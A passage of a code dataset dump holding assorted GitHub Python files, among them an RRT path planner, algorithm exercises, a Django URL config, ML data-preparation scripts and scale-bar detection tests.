instance_id, _ in unique_context_tuples], \n coref_preds_report):\n unique_id_to_source_coref_clusters[unique_id] = {'report': coref_pred_report.get_clusters()}\n ########################################################\n ### Source Coref Clusters\n ########################################################\n # Get the coref chains for source\n coref_preds_source = coref_model.predict(\n texts=[doctext_dict['source_doctext'] for _, doctext_dict in\n unique_context_tuples]\n )\n for unique_id, coref_pred_source in zip([instance_id for instance_id, _ in unique_context_tuples],\n coref_preds_source):\n unique_id_to_source_coref_clusters[unique_id]['source'] = coref_pred_source.get_clusters()\n\n ########################################################\n ## Save the coref clusters\n ########################################################\n with open(os.path.join(args.output_dir, \"instance_id_to_coref_clusters.json\"), \"w\") as f:\n json.dump(unique_id_to_source_coref_clusters, f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"FACTSlab/FAMuS","sub_path":"src/data_processing/create_coref_clusters_for_data.py","file_name":"create_coref_clusters_for_data.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72304642729","text":"#Different method types in python\n\n#In python there are three different method types. The static method, the class method and the instance method. Each one of them has different characteristics and should be used in different situations.\n\nclass Student:\n schoolname=\"kolkata\"\n def __init__(self,m1,m2,m3):\n self.m1=m1\n self.m2=m2\n self.m3=m3\n\n def avg(self): # this is an instance method\n return (self.m1+self.m2+self.m3)/3\n @classmethod #class Method\n def schoolinfo(cls):\n print(f\"my school name {cls.schoolname}\")\n @staticmethod\n def schooltest():\n print(\"testt\")\n\nmysccholobject=Student(30,40,50)\nmysccholobject2=Student(70,80,90)\nprint(mysccholobject.m1)\nprint(mysccholobject.m2)\nprint(mysccholobject.m1)\nprint(mysccholobject.avg())\nprint(mysccholobject2.avg())\nmysccholobject2.schoolinfo()\nmysccholobject2.schooltest()\n\n","repo_name":"avijitMajumder/python_learning","sub_path":"Types of Methods.py","file_name":"Types of Methods.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
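The record above names the three method types but does not show when each is the right choice. A common illustration (a hypothetical variation on the same Student idea, not the file's own code) is a classmethod as an alternative constructor and a staticmethod for helpers that need neither the instance nor the class:

```python
class Student:
    school = "kolkata"

    def __init__(self, m1, m2, m3):
        self.m1, self.m2, self.m3 = m1, m2, m3

    @classmethod
    def from_csv(cls, line):
        # Alternative constructor: using cls keeps subclasses working too.
        return cls(*map(int, line.split(",")))

    @staticmethod
    def passing(mark):
        # Needs neither the instance nor the class.
        return mark >= 40

s = Student.from_csv("70,80,90")
print(s.m1, Student.passing(s.m1))   # 70 True
```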
+{"seq_id":"71344875687","text":"import Structure\nimport createDomain\nimport matplotlib.pyplot as plt\nimport copy\nimport random\nimport numpy as np\nimport matplotlib.collections as mc\nimport time\n\n\nclass solver:\n def __init__(self, problem, step=1, threshold=1):\n self.problem = problem\n self.root = Structure.Node(problem.getInitial())\n self.goal = Structure.Node(problem.getGoal())\n # a tree associated with the problem\n self.tree = Structure.Tree(self.root)\n self.threshold = threshold # this controls the bias\n self.step = step # step size\n self.limit = 10000 # maximum nodes generated\n\n # draw the problem with a given path\n def visualize(self, path=None):\n self.problem.drawDomain(path)\n\n # this method solves the problem using rrt\n # if it can't solve within the limit then it returns None\n # it will also plot the graph\n def solve(self):\n q_new = self.root\n q_goal = self.goal\n count = 0\n start_time = time.time()\n while count <= self.limit:\n q_target = self.randomNode(0.1)\n q_nearest = self.tree.findNearestNode(q_target)\n q_new = self.extend(q_nearest, q_target, self.step)\n if q_new is not None:\n print(q_new.getCoordinate())\n q_new.setParent(q_nearest)\n self.tree.addNode(q_new)\n if q_new.distance(q_goal) < self.threshold:\n q_goal.setParent(q_new)\n self.tree.addNode(self.root)\n break\n count += 1\n if count > self.limit:\n return None\n else:\n # self.drawTree()\n path = self.traceBack(q_new)\n path.append(self.goal)\n\n print('the runtime is: {} s'.format(time.time() - start_time))\n if path is not None:\n print('the solver solved the problem!')\n print('Number of nodes in the path:{}'.format(len(path)))\n print('Number of total nodes in the random tree:{}'.format(\n len(self.tree.nodes)))\n self.finalVisualize([obs.getCoordinate() for obs in path])\n return path\n\n # generate a random node that does not overlap with obstacles\n # with some bias choose the goal directly\n def randomNode(self, probability):\n if random.random() < probability:\n return self.goal\n found = False\n while found is False:\n coord = (100 * random.random(), 100 * random.random())\n node = Structure.Node(coord)\n if not self.problem.CheckOverlap(node):\n found = True\n return node\n return None\n\n # given a random node find the nearest node in the tree and try to extend it\n # if it can't do that, then return None\n def extend(self, nearest, target, step):\n if nearest.distance(target) > step:\n (x1, y1), (x2, y2) = nearest.getCoordinate(), target.getCoordinate()\n if x1 == x2:\n coord = (x1, y1 + step * (y2 - y1) / abs(y1 - y2))\n else:\n vec = np.asarray((x2 - x1, y2 - y1))\n normalized = vec / np.linalg.norm(vec)\n difference = normalized * step\n coord = tuple(np.asarray((x1, y1)) + difference)\n node = Structure.Node(coord)\n else:\n node = target\n if not self.problem.CheckOverlap(node):\n return node\n else:\n return None\n\n # given a node, this method will find all its ancestors\n def traceBack(self, kid):\n result = []\n temp = kid\n limit = 100000\n count = 0\n\n while temp is not None:\n result.insert(0, temp)\n if count > limit:\n break\n count += 1\n temp = temp.getParent()\n # print(result)\n return result\n\n # visualize the tree associated with the problem\n def drawTree(self):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1, aspect='equal')\n ax.set_xlim(0.0, self.problem.width)\n ax.set_ylim(0.0, self.problem.height)\n for o in self.problem.obstacles:\n ax.add_patch(copy.copy(o.patch))\n ip = plt.Rectangle(self.root.getCoordinate(), .81, .81,\n facecolor='#ff0000', label='initial')\n ax.add_patch(ip)\n g = plt.Rectangle(self.goal.getCoordinate(), .81, .81,\n facecolor='#00ff00', label='goal')\n ax.add_patch(g)\n collections = []\n for node in self.tree.nodes:\n if node.parent is not None:\n z = [node.getCoordinate(), node.parent.getCoordinate()]\n collections.append(z)\n lc = mc.LineCollection(collections, colors='b', linewidths=0.8)\n ax.add_collection(lc)\n ax.legend(bbox_to_anchor=(1.04, 1), loc=\"upper left\")\n plt.show()\n\n # this method will draw a path and a tree after solving the problem\n def finalVisualize(self, path):\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1, aspect='equal')\n ax.set_xlim(0.0, self.problem.width)\n ax.set_ylim(0.0, self.problem.height)\n for o in self.problem.obstacles:\n ax.add_patch(copy.copy(o.patch))\n ip = plt.Rectangle(self.root.getCoordinate(), .81, .81,\n facecolor='#ff0000', label='initial')\n ax.add_patch(ip)\n g = plt.Rectangle(self.goal.getCoordinate(), .81, .81,\n facecolor='#00ff00', label='goal')\n ax.add_patch(g)\n collections = 
[]\n for node in self.tree.nodes:\n if node.parent is not None:\n z = [node.getCoordinate(), node.parent.getCoordinate()]\n collections.append(z)\n lc = mc.LineCollection(collections, colors='b',\n linewidths=0.8, label='tree')\n ax.add_collection(lc)\n if path is not None:\n x = [x for (x, y) in path]\n y = [y for (x, y) in path]\n plt.plot(x, y, label='path', color='r')\n ax.legend(bbox_to_anchor=(1.04, 1), loc=\"upper left\")\n plt.show()\n\n\nif __name__ == '__main__':\n # you can change the number (i.e. 50) to control the number of obstacles\n domain = createDomain.Domain(30, 20)\n solver1 = solver(domain)\n path = solver1.solve()\n","repo_name":"JudahZammit/Comp4190A3","sub_path":"RRTsolver.py","file_name":"RRTsolver.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39233409177","text":"def digits(n):\n k=n\n m=int()\n s=[]\n while(k>0):\n m=k%10\n s.append(m)\n k=k//10\n s.sort()\n return s\n\ndef gen_lis(n): \n i=1\n s=[]\n while(i<=n):\n s.append(i)\n i+=1\n return s\n\ndef check_pan(n):\n s=gen_lis(len(digits(n)))\n p=digits(n)\n if(s==p):\n return True\n\ndef loop(n):\n x=1\n y=1\n m=''\n b=1\n q=[]\n while(x<=n):\n while(y<=n):\n m=str(y)+str(x)+str(x*y)\n b=int(m)\n if(check_pan(b)==True and len(digits(b))==9):\n q.append(x*y)\n y+=1\n x+=1\n y=0\n q = list(dict.fromkeys(q))\n return q\n\nloop(1000)\n\n\n\t\n\n","repo_name":"fermihacker/ProjectEuler100","sub_path":"Problem032.py","file_name":"Problem032.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"4518431942","text":"import numpy as np\nimport h5py\n\n# labels = ['econom', 'financ', 'movie', 'music', 'news', 'resume', 'scien',\n# 'sport', 'stop', 'world', 'us']\n\n\ndef find_start_end(line_temp, line):\n start_file = 0\n end_file = 0\n filename = []\n if len(line_temp) == 1 and line != \".\":\n filename_temp = line.split(\"/\")[-1]\n filename = filename_temp.split(\".\")[0]\n start_file = 1\n end_file = 0\n print(filename)\n elif len(line_temp) == 1 and line == \".\":\n end_file = 1\n start_file = 0\n\n return filename, start_file, end_file\n\n\ndef find_kw(line_temp):\n labels = ['econom', 'financ', 'movie', 'music', 'news', 'resume', 'scien',\n 'sport', 'stop', 'world', 'us']\n keyword = []\n kw_found = 0\n for label2 in labels:\n if label2 in line_temp[-1][0:len(label2)]:\n if label2 == \"us\":\n if line_temp[-1][:-1] == \"us\":\n keyword = \"us\"\n print(keyword)\n kw_found = 1\n break\n else:\n keyword = line_temp[-1][:-1]\n print(keyword)\n kw_found = 1\n break\n\n return keyword, kw_found\n\n\ndef generator_train():\n path_feature = \"./data/multi-feature/\"\n while 1:\n # following loads data from HDF5 file numbered with fileIndex\n x = h5py.File(path_feature + \"train/train.hdf5\", \"r\")\n keys = x.keys()\n for key in keys:\n print(x[key])\n\n\n\ndef generator_test():\n x = 1\n return x\n\n\n\n\n","repo_name":"abkoesdw/multi-keywords-spotting","sub_path":"multi_keywords_func.py","file_name":"multi_keywords_func.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"19126840133","text":"import numpy as np\nimport cv2\nimport openslide\nimport os\nfrom PIL import Image\nimport sys\n\nslide = sys.argv[1]\n#id = '17039791'\noutput = sys.argv[2]\n\nif not os.path.exists(output):\n os.mkdir(output);\n\noslide = 
openslide.OpenSlide(slide)\nwidth = oslide.dimensions[0]\nheight = oslide.dimensions[1]\n\nlevel = oslide.level_count - 1\n\nscale_down = oslide.level_downsamples[level]\nw, h = oslide.level_dimensions[level]\n\n#print('level: ', level)\n#print('size: {}, {}'.format(w, h))\n\npatch = oslide.read_region((0, 0), level, (w, h));\n\nslide_id = slide.split('/')[-1].split('.svs')[0]\nfname = '{}/{}_mask.png'.format(output, slide_id);\n#fname = '{}/{}_mask.png'.format(output, scale_down);\npatch.save('{}/{}_resized.png'.format(output, slide_id));\n\nimg = cv2.imread('{}/{}_resized.png'.format(output, slide_id), 0)\nimg = cv2.GaussianBlur(img, (61, 61), 0)\nret, imgf = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\ncv2.imwrite(fname, imgf)\n\noslide.close()\n\n#imgf = cv2.resize(imgf, (0, 0), fx = 0.3, fy = 0.3)\n#cv2.imshow('img', imgf)\n","repo_name":"SBU-BMI/quip_paad_cancer_detection","sub_path":"patch_extraction_tumor_40X/back_ground_filter.py","file_name":"back_ground_filter.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"37316055232","text":"\"\"\"\nJian Zhi Offer 11. Minimum Number in a Rotated Array\nMoving some leading elements of an array to its end is called a rotation of the array.\nGiven one rotation of an array sorted in increasing order, output the minimum element of the rotated array.\nFor example, the array [3,4,5,1,2] is a rotation of [1,2,3,4,5], and its minimum is 1.\n\nExample 1:\n\nInput: [3,4,5,1,2]\nOutput: 1\nExample 2:\n\nInput: [2,2,2,0,1]\nOutput: 0\n\ndate : 9-27-2020\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n # Perfect code\n def minArray_(self, numbers: [int]) -> int:\n i, j = 0, len(numbers) - 1\n while i < j:\n m = (i + j) // 2\n if numbers[m] > numbers[j]:\n i = m + 1\n elif numbers[m] < numbers[j]:\n j = m\n else:\n j -= 1\n return numbers[i]\n\n def minArray(self, numbers: List[int]) -> int:\n if not numbers:\n return 0\n if len(numbers) == 1:\n return numbers[0]\n left, mid, right = 0, 0, len(numbers)-1\n\n while numbers[left] >= numbers[right]:\n if right - left == 1:\n mid = right\n break\n mid = (left + right) // 2\n if numbers[left] == numbers[mid] == numbers[right]:\n return self.minInOrder(numbers, left, right)\n\n if numbers[mid] >= numbers[left]:\n left = mid\n elif numbers[mid] <= numbers[right]:\n right = mid\n\n return numbers[mid]\n\n def minInOrder(self, numbers, left, right):\n res = numbers[left]\n for i in range(left, right):\n if res > numbers[i]:\n res = numbers[i]\n return res\n\n\nsol = Solution()\n# nums = [10, 1, 10, 10, 10]\n# nums = [1, 3, 5]\n# nums = [1, 0, 1, 1, 1]\nnums = [1, 1, 1, 0, 1]\n\n# print(sol.minArray(nums))\nprint(sol.minArray_(nums))\n","repo_name":"Aiooon/MyLeetcode","sub_path":"python/offer_11_minArray.py","file_name":"offer_11_minArray.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
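The subtle branch in minArray_ above is the duplicate case: when numbers[m] == numbers[j] the minimum could be on either side of m, so the only safe move is to shrink the window by one (j -= 1), which degrades the binary search to O(n) only in heavily duplicated inputs. A short trace on the script's own test input (assuming the Solution class above is in scope):

```python
# Trace of minArray_ on [1, 1, 1, 0, 1], the script's own test case:
#   i=0, j=4: m=2, nums[2]=1 == nums[4]=1  -> j=3  (can't tell which side)
#   i=0, j=3: m=1, nums[1]=1 >  nums[3]=0  -> i=2  (minimum lies right of m)
#   i=2, j=3: m=2, nums[2]=1 >  nums[3]=0  -> i=3  (loop ends, i == j)
# Result: nums[3] == 0.
assert Solution().minArray_([1, 1, 1, 0, 1]) == 0
```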
+{"seq_id":"33339942083","text":"def levenshteinDistance(s1, s2):\n if len(s1) < len(s2):\n return levenshteinDistance(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n # print(\"S1\",i,c1)\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n # print(\"S2\",j,c2)\n # https://medium.com/@ethannam/understanding-the-levenshtein-distance-equation-for-beginners-c4285a5604f0\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2) # if c1 == c2 else 1\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\ndef main():\n print(levenshteinDistance(\"kitten\", \"sitting\"))\n\nif __name__ == \"__main__\":\n main()","repo_name":"ananthanandanan/academics","sub_path":"inform_ret/levenshteinDistance.py","file_name":"levenshteinDistance.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"15339080724","text":"caloriesByElf = [0]\nelfIndex = 0\n\ninputFile = open(\"input.txt\", \"r\")\n\nfor line in inputFile:\n number = line[:-1]\n if len(number) == 0:\n caloriesByElf.append(0)\n elfIndex += 1\n else:\n caloriesByElf[elfIndex] += int(line)\n\ninputFile.close()\n\ntotal = 0\nfor i in range(3):\n maxCalories = max(caloriesByElf)\n total += maxCalories\n caloriesByElf.remove(maxCalories)\n\nprint(total)\n","repo_name":"Vimor123/advent-of-code-2022","sub_path":"day01/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29972543487","text":"from django.urls import path, re_path\nfrom . import views\nfrom chat import views as viewss\n\nurlpatterns = [\n path('login/', views.login_page, name='login'),\n path('register/', views.register_user_preliminary, name='register'),\n # path(r'^ajax/validate_username/$', views.validate_username, name='validate_username'),\n path('logout/', views.logout_view, name='logout'),\n path('request-box/<str:pk>', views.request_box, name='request-box'),\n path('friends/<str:pkk>/e2AAS2accpt23487dhjbSS<str:pk>AD8U3Hisd3nO8',\n views.accept_friendship, name='accept'),\n path('friends/<str:pkk>/adsjnSI38DJjndas83DDNKjab<str:pk>dde3ubufeb',\n views.ignore_friendship, name='ignore'),\n path('7sn2njJHDAnd93983y4<str:pk>sabu62e3d9hidwdYWDG7G6t',\n views.retract_friendship, name='retract'),\n path('friends/<str:pkk>/adia7378VSJASjhsxdhD763Gjb<str:pk>dnsfi8GDg6sasvJHd2S5',\n views.delete_friendship, name='delete-fr'),\n path('d2983jfewubWEAJKE89<str:pk>LK8897hDSQ7Goiuad',\n views.send_friendship, name='bmf'),\n path('friends/<str:pk>/', views.friends_list, name='friends'),\n path('mfriends/<str:pk>/', views.friends_list_mobile, name='mfriends'),\n path('', views.home, name='home'),\n path('ajax/validate_username/',\n views.validate_username, name='validate-username'),\n path('room/<str:pk>/', views.room, name='room'),\n path('userprofile/<str:pk>/', views.user_profile, name='userprofile'),\n path('create-room/', views.create_room, name='create-room'),\n path('update-room/<str:pk>/', views.update_room, name='update-room'),\n path('update-user/', views.update_user, name='update-user'),\n path('activity-page/', views.activity_page, name='activity-page'),\n path('topics/', views.topics_page, name='topics'),\n path('delete-room/<str:pk>/', views.delete_room, name='delete-room'),\n path('delete-message/<str:pk>/', views.delete_message, name='delete-message'),\n path('delete-pm-message/<str:pk>',\n viewss.delete_pm_message, name='delete-pm-message'),\n path('loadmore/', views.load_more, name='loadmore'),\n re_path(\n r'\\w+(\\d|[a-z]|[A-Z]){6}(\\d|[a-z]|[A-Z]){9}(\\d){5}([A-Z]|[a-z]){5}[a-z]{3}(\\d|[A-Z]|[a-z]){4}',\n views.register_user),\n path('status-checker/', views.status_checker, name=\"status_checker\"),\n path('profile-status/<str:pk>', views.profile_status, 
name=\"profile_status\"),\n]\n","repo_name":"CarettaCaretta11/bhossc","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30978993643","text":"\"\"\"\nSimple utility to render an .svg to a .png\n\"\"\"\nimport os\nimport argparse\nimport pydiffvg\nimport torch as th\n\n\ndef render(canvas_width, canvas_height, shapes, shape_groups):\n _render = pydiffvg.RenderFunction.apply\n scene_args = pydiffvg.RenderFunction.serialize_scene(\n canvas_width, canvas_height, shapes, shape_groups)\n img = _render(canvas_width, # width\n canvas_height, # height\n 2, # num_samples_x\n 2, # num_samples_y\n 0, # seed\n None,\n *scene_args)\n # print(img.size())\n img = img[:, :, 3:4] * img[:, :, :3] + th.ones(img.shape[0], img.shape[1], 3, device=pydiffvg.get_device()) * (1 - img[:, :, 3:4])\n return img\n\n\ndef main(svg_dirs):\n pydiffvg.set_device(th.device('cuda:1'))\n\n assert os.path.exists(svg_dirs)\n svg_files = os.listdir(svg_dirs)\n for svg_file in svg_files:\n if '.svg' not in svg_file:\n continue\n svg_file_path = os.path.join(svg_dirs, svg_file)\n out_file_path = svg_file_path.replace('.svg', '.png')\n # Load SVG\n canvas_width, canvas_height, shapes, shape_groups = pydiffvg.svg_to_scene(svg_file_path)\n # Save initial state\n ref = render(canvas_width, canvas_height, shapes, shape_groups)\n pydiffvg.imwrite(ref.cpu(), out_file_path, gamma=2.2)\n\n\nif __name__ == \"__main__\":\n # parser = argparse.ArgumentParser()\n # parser.add_argument(\"svg_dirs\", help=\"source SVG path\")\n # args = parser.parse_args()\n styles = ['4', '9', '14', '30']\n # styles = ['30']\n for s in styles:\n svg_dirs = f'partial_svg_diffvg/style_{s}'\n main(svg_dirs)\n","repo_name":"hologerry/diffvg","sub_path":"apps/render_svg_dirs.py","file_name":"render_svg_dirs.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"34871012010","text":"import sys\nsys.path.append('/homes/ydwang/projects')\nfrom utils.Split_Dataset import split_dataset_folds\nimport csv\nimport os\nimport pandas as pd\nimport numpy as np\n\n\nclass make_index_csv:\n def __init__(self, case_list, save_csv_path, test_index_percent=0.2, nfold=4, is_upsample=False, up_label=1, up_times=0):\n self.case_list = case_list\n self.save_path = save_csv_path\n self.test_index_percent = test_index_percent\n self.nfold = nfold\n self.is_upsample = is_upsample\n self.up_times = up_times\n self.up_label = up_label\n self.csv_names = ['train_index.csv', 'val_index.csv', 'test_index.csv']\n\n def get_csv(self):\n for m in range(self.nfold):\n train_list, val_list, test_list = [], [], []\n train_label_list, val_label_list, test_label_list = [], [], []\n\n for label, case in enumerate(self.case_list):\n [train_nfold, val_nfold, test_index] = split_dataset_folds(case, self.test_index_percent, self.nfold)\n train_index = train_nfold[m]\n val_index = val_nfold[m]\n if self.is_upsample == True and label == self.up_label:\n for i in range(self.up_times):\n train_list += train_index\n train_label_list += len(train_index) *[label]\n val_list += val_index\n val_label_list += len(val_index) *[label]\n test_list += test_index\n test_label_list += len(test_index) *[label]\n else:\n train_list += train_index\n train_label_list += len(train_index) *[label]\n val_list += val_index\n val_label_list += len(val_index) *[label]\n test_list += test_index\n 
test_label_list += len(test_index) *[label]\n\n index_list = [train_list, val_list, test_list]\n label_list = [train_label_list, val_label_list, test_label_list]\n print(test_list)\n\n for i in range(len(self.csv_names)):\n row_list =[]\n save_folder = os.path.join(self.save_path, 'fold_' + str(m))\n os.makedirs(save_folder, exist_ok=True)\n with open(os.path.join(save_folder, self.csv_names[i]), 'w') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['ID', 'label'])\n for j in range(len(index_list[i])):\n row_list.append([index_list[i][j], label_list[i][j]])\n writer.writerows(row_list)\n\n\ndef get_case_list(folder, csv_path):\n PD_list, NC_list = [], []\n df = pd.read_excel(csv_path)\n data = np.asarray(df.values)[:, 0:2]\n files = os.listdir(folder)\n other_list = []\n print(len(files))\n for file in files:\n for i in range(data.shape[0]):\n id = data[i][1]\n if str(id) == str(file[0:10]):\n label = data[i][0]\n if label == 'PD':\n PD_list.append(file)\n elif label == 'NC':\n NC_list.append(file)\n elif label == 'NC ':\n NC_list.append(file)\n else:\n other_list.append(file)\n print(len(NC_list), len(PD_list))\n return PD_list, NC_list\n\n\nif __name__ == '__main__':\n csv_file = r'/homes/ydwang/Data/rujin_case_list_key-20200530-toECNU.xlsx'\n folder = r'/homes/ydwang/Data/stage_data_0616'\n [PD_list, NC_list] = get_case_list(folder, csv_file)\n\n save_path = r'/homes/ydwang/projects/RJ_PD_dignosis/index/5_fold_up'\n make_index_csv(case_list=[NC_list, PD_list], save_csv_path=save_path,nfold=5,\n is_upsample=True, up_label=1, up_times=3).get_csv()\n","repo_name":"wangyidada/PD_diagnosis","sub_path":"PD_Diagnosis_code/utils/make_csv_index.py","file_name":"make_csv_index.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42984347867","text":"import unittest\nimport json\nimport pathlib\nimport os\nfrom PIL import Image\nimport random\nimport torchvision.transforms as T\nimport torch\nimport numpy as np\n\nfrom .. 
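make_csv_index above upsamples one class simply by appending its fold indices several times before writing (ID, label) rows. A minimal standalone sketch of that repetition trick with csv.writer; the case IDs and the 3x factor are made up.

import csv, io

nc_cases = ["case_a", "case_b"]            # label 0
pd_cases = ["case_c"]                      # label 1, upsampled 3x by repetition
rows = [(c, 0) for c in nc_cases] + [(c, 1) for c in pd_cases] * 3

buf = io.StringIO()                        # stands in for the fold CSV file
writer = csv.writer(buf)
writer.writerow(["ID", "label"])
writer.writerows(rows)
print(buf.getvalue())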
import figure\nfrom ..figures.scale.dataset import ScaleBarDataset\nfrom ..figures.scale.engine import evaluate\nfrom ..figures.scale.utils import collate_fn\n\nclass TestScaleDetection(unittest.TestCase):\n\n def setUp(self):\n \"\"\" Instantiates a test search query and FigureSeparator to test \"\"\"\n nature_json = pathlib.Path(__file__).parent / 'data' / 'nature_test.json'\n with open(nature_json, \"r\") as f:\n query = json.load(f)\n\n self.query = query\n self.figure_separator = figure.FigureSeparator(query)\n self.current_directory = pathlib.Path(__file__).resolve(strict=True).parent\n \n def test_scale_object_detection_accuracy(self):\n \"\"\" Tests the accuracy and validity of scale bar object detection \"\"\"\n test_image_directory = self.current_directory / 'data'\n dataset = ScaleBarDataset(test_image_directory, T.ToTensor(), True, 5)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=32,\n collate_fn=collate_fn, num_workers=0,\n shuffle=False)\n coco_eval = evaluate(self.figure_separator.scale_bar_detection_model,\n dataloader, self.figure_separator.device)\n\n def test_scale_label_reading_accuracy(self):\n \"\"\" Tests the accuracy of reading scale bar labels \"\"\"\n # set constants\n scale_label_data = pathlib.Path(__file__).parent / 'data' / 'scale_label_dataset'\n min_low_test_images = 100\n min_high_test_images = 50\n max_test_images = 250\n high_confidence_threshold = 0.9\n expected_high_confidence_correct = 0.8\n low_confidence_threshold = 0.6\n expected_low_confidence_correct = 0.5\n \n # keep track of accuracy\n high_correct = 0\n high_total = 0\n low_correct = 0\n low_total = 0\n total = 0\n\n # test on random images\n while ((high_total < min_high_test_images or \n low_total < min_low_test_images) and \n total < max_test_images):\n total += 1\n # randomly pick label\n label_dir = random.choice(os.listdir(scale_label_data))\n label = str(label_dir)\n # randomly pick image with selected label\n image_file = random.choice(os.listdir(scale_label_data / label))\n scale_label_image = Image.open(scale_label_data / label / image_file).convert(\"RGB\")\n result, confidence = self.figure_separator.read_scale_bar(scale_label_image)\n \n if confidence < low_confidence_threshold:\n continue\n # if confidence above lower threshold\n low_total += 1\n if result == label:\n low_correct += 1\n # if confidence above higher threshold\n if confidence >= high_confidence_threshold:\n high_total += 1\n if result == label:\n high_correct += 1\n # accuracy tests\n self.assertGreaterEqual(low_total, min_low_test_images, \n (\"Only {} images had a confidence of greater than {}\".format(\n low_total, low_confidence_threshold)))\n self.assertGreaterEqual(high_total, min_high_test_images, \n (\"Only {} images had a confidence of greater than {}\".format(\n high_total, high_confidence_threshold)))\n high_accuracy = high_correct / float(high_total)\n low_accuracy = low_correct / float(low_total)\n self.assertGreater(low_accuracy, expected_low_confidence_correct,\n (\"Scale label reading had poor accuracy with {} % correct, \"\n \"less than desired {}% for predictions with confidence score \"\n \"of {}\".format(low_accuracy, expected_low_confidence_correct,\n low_confidence_threshold)))\n self.assertGreater(high_accuracy, expected_high_confidence_correct,\n (\"Scale label reading had poor accuracy with {} % correct, \"\n \"less than desired {}% for predictions with confidence score \"\n \"of {}\".format(high_accuracy, expected_high_confidence_correct,\n 
high_confidence_threshold)))\n\n\nclass TestSubfigureDetection(unittest.TestCase):\n\n def setUp(self):\n \"\"\" Instantiates a test search query and FigureSeparator to test \"\"\"\n nature_json = pathlib.Path(__file__).parent / 'data' / 'nature_test.json'\n with open(nature_json, \"r\") as f:\n query = json.load(f)\n self.query = query\n self.figure_separator = figure.FigureSeparator(query)\n\n def test_subfigure_detection_accuracy(self):\n \"\"\" Tests the accuracy and validity of identifying subfigures \"\"\"\n pass\n\n def test_subfigure_label_reading_accuracy(self):\n \"\"\" Tests the accuracy and validity of reading subfigure labels \"\"\"\n pass\n\n def test_subfigure_classification_accuracy(self):\n \"\"\" Tests the accuracy and validity of classifying subfigures \"\"\"\n pass\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"MaterialEyes/exsclaim","sub_path":"exsclaim/tests/accuarcy_test.py","file_name":"accuarcy_test.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"73208185447","text":"from .parametric_curve import ParametricCurve\nfrom .interval import Interval\n\nimport numpy as np\n\n\nclass Circle(ParametricCurve):\n # A circle in R^2.\n\n def __init__(self, radius, centre):\n \"\"\"\n Parameters\n ----------\n radius The radius of the circle.\n centre The centre of the circle.\n \"\"\"\n\n self.centre = centre\n self.radius = radius\n super().__init__(\n lambda t: self.centre[0] + self.radius * np.cos(t),\n lambda t: self.centre[1] + self.radius * np.sin(t),\n Interval(0, 2 * np.pi)\n )","repo_name":"lorenzoliuzzo/scippy","sub_path":"src/mathematics/curves/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39512814139","text":"from dataclasses import asdict, dataclass\nfrom hashlib import md5\nfrom typing import TYPE_CHECKING, List, Optional\n\nif TYPE_CHECKING:\n from posthog.models import Team\n\n\n@dataclass\nclass WebJsSource:\n id: int\n source: str\n token: str\n config_schema: List[dict]\n config: dict\n\n\n@dataclass\nclass WebJsUrl:\n id: int\n url: str\n\n\ndef get_transpiled_site_source(id: int, token: str) -> Optional[WebJsSource]:\n from posthog.models import PluginConfig, PluginSourceFile\n\n response = (\n PluginConfig.objects.filter(\n id=id,\n web_token=token,\n enabled=True,\n plugin__pluginsourcefile__filename=\"site.ts\",\n plugin__pluginsourcefile__status=PluginSourceFile.Status.TRANSPILED,\n )\n .values_list(\n \"id\",\n \"plugin__pluginsourcefile__transpiled\",\n \"web_token\",\n \"plugin__config_schema\",\n \"config\",\n )\n .first()\n )\n\n if not response:\n return None\n\n return WebJsSource(*(list(response))) # type: ignore\n\n\ndef get_decide_site_apps(team: \"Team\", using_database: str = \"default\") -> List[dict]:\n from posthog.models import PluginConfig, PluginSourceFile\n\n sources = 